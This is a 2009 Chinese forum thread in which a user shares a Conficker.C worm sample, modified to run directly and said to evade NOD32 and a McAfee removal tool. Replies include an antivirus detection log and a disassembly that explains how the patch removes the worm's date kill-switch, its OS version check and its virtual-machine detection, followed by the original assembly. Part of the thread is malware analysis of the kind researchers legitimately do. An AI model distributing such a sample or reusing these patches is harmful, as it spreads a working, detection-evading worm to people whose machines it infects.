[病毒样本] Conficker.C.exe

hmily

Conficker.C版本.自己修改了下程序运行流程,现在可以直接运行了,样本拿到2天了,目前还过我机器上的NOD32,那个什么麦咖啡Conficker专杀内存也没扫到,测试请注意安全


解压密码:virus

smallyou93

原帖由 hmily 于 2009-4-1 17:02 发表
Conficker.C版本.自己修改了下程序运行流程,现在可以直接运行了,样本拿到2天了,目前还过我机器上的NOD32,那个什么麦咖啡Conficker专杀内存也没扫到,测试请注意安全


解压密码:virus

[ 本帖最后由 smallyou93 于 2009-4-1 17:19 编辑 ]

hmily

楼上的天天到处发黄色图片....

金剑人

C:\Documents and Settings\Administrator\桌面\878595156.rar > RAR > 878595156.tmp - Win32/Conficker.V 蠕虫 的变种

轩辕小聪

0041B6A4    8D45 F0         lea     eax, dword ptr [ebp-10]
0041B6A7    50              push    eax
0041B6A8    FF15 14104000   call    dword ptr [<&KERNEL32.GetSystemTime>]                      ; kernel32.GetSystemTime
0041B6AE    66:817D F0 D907 cmp     word ptr [ebp-10], 7D9
0041B6B4    8B3D 80104000   mov     edi, dword ptr [<&MSVCRT.sprintf>]                         ; MSVCRT.sprintf
0041B6BA    EB 1E           jmp     short 0041B6DA
0041B6BC    90              nop
0041B6BD    90              nop
0041B6BE    90              nop
0041B6BF    90              nop
0041B6C0    75 18           jnz     short 0041B6DA
0041B6C2    66:837D F2 03   cmp     word ptr [ebp-E], 3
0041B6C7    0F87 5D010000   ja      0041B82A
0041B6CD    75 0B           jnz     short 0041B6DA
0041B6CF    66:837D F6 13   cmp     word ptr [ebp-A], 13
0041B6D4    0F87 50010000   ja      0041B82A
0041B6DA    FF15 18104000   call    dword ptr [<&KERNEL32.GetVersion>]                         ; kernel32.GetVersion
0041B6E0    3C 05           cmp     al, 5
0041B6E2    90              nop
0041B6E3    90              nop
0041B6E4    90              nop
0041B6E5    90              nop
0041B6E6    90              nop
0041B6E7    90              nop
0041B6E8    0F00C0          sldt    ax
0041B6EB    66:85C0         test    ax, ax
0041B6EE    90              nop
0041B6EF    90              nop
0041B6F0    90              nop
0041B6F1    90              nop
0041B6F2    90              nop
0041B6F3    90              nop
0041B6F4    8885 DCFEFFFF   mov     byte ptr [ebp-124], al

改的是这里吧。
第一处nop，原来应该是如果系统时间在2009年3月19日以后，就不作实质性操作而直接跳到后面使用批处理删除自身并退出。现在改为直接jmp不作判断，去除了时间限制
第二处nop，原来应该是如果系统不是Win200/XP/2003（5）就跳走。这句似乎可以不需要处理，毕竟一般不会在其他系统下测这个毒。当然有些人喜欢在Vista下跑，这样我觉得不好，因为这里显然说明Conficker不是为Vista而设计的。
update:楼下贴原始代码了，原来是jb，那意示着只有在Win2000以下的系统会被跳走，还是可以Vista的。
第三处nop我就看不出来了，sldt的操作意义不明。而且后面的看到mov     byte ptr [ebp-124], al，这是字符串开头填00字符的操作，在此之前al必须置0，但是我在上面没有看到这个置0操作（sldt似乎没有al置0的作用），难道是被nop掉了？
update:看了原始代码，刚问了天津小白，回答“我记得在检测虚拟机的代码里出现过”，Google一下可以确定了，这起的是检测虚拟机的作用，在虚拟机下运行时与在真实主机运行时相比，sldt指令的结果是不一样的，因此这里用一个jnz，在检测到虚拟机情况下也直接跳走。
同时这个jnz也解释了al置0的问题。

结论：
这里nop掉的包含三个检测条件（虽然看下面回复，hmily自己都不清楚，但是事实证明nop的这三个还是有意义的）：
1.系统时间超过2009年3月19日则跳走
2.系统版本低于Win2000则跳走
3.系统在虚拟机下运行，则跳走

[ 本帖最后由 轩辕小聪 于 2009-4-1 19:02 编辑 ]

hmily

膜拜大牛啊,我没分析那么细, 我自己是直接DLL带参数运行的,那几个只是NOP掉了2个跳转改了一个JMP可能影响运行的因素,方便别人运行而已,不用和我计较这么的多吧?

hmily

0041B6A8    FF15 14104000    call dword ptr ds:[<&KERNEL32.GetSys>; kernel32.GetSystemTime
0041B6AE    66:817D F0 D907  cmp word ptr ss:[ebp-10],7D9
0041B6B4    8B3D 80104000    mov edi,dword ptr ds:[<&MSVCRT.sprin>; msvcrt.sprintf
0041B6BA    0F87 6A010000    ja 1.0041B82A
0041B6C0    75 18            jnz short 1.0041B6DA
0041B6C2    66:837D F2 03    cmp word ptr ss:[ebp-E],3
0041B6C7    0F87 5D010000    ja 1.0041B82A
0041B6CD    75 0B            jnz short 1.0041B6DA
0041B6CF    66:837D F6 13    cmp word ptr ss:[ebp-A],13
0041B6D4    0F87 50010000    ja 1.0041B82A
0041B6DA    FF15 18104000    call dword ptr ds:[<&KERNEL32.GetVer>; kernel32.GetVersion
0041B6E0    3C 05            cmp al,5
0041B6E2    0F82 42010000    jb 1.0041B82A
0041B6E8    0F00C0           sldt ax
0041B6EB    66:85C0          test ax,ax
0041B6EE    0F85 36010000    jnz 1.0041B82A
0041B6F4    8885 DCFEFFFF    mov byte ptr ss:[ebp-124],al
0041B6FA    8D45 EC          lea eax,dword ptr ss:[ebp-14]
0041B6FD    50               push eax
0041B6FE    8D85 DCFEFFFF    lea eax,dword ptr ss:[ebp-124]
0041B704    50               push eax
0041B705    8975 EC          mov dword ptr ss:[ebp-14],esi

满足你的好奇心~

dl123100

谢谢提供 没52pojie的id
幸好也发janmeng了

hmily

52pojie这个星期天八点开放注册~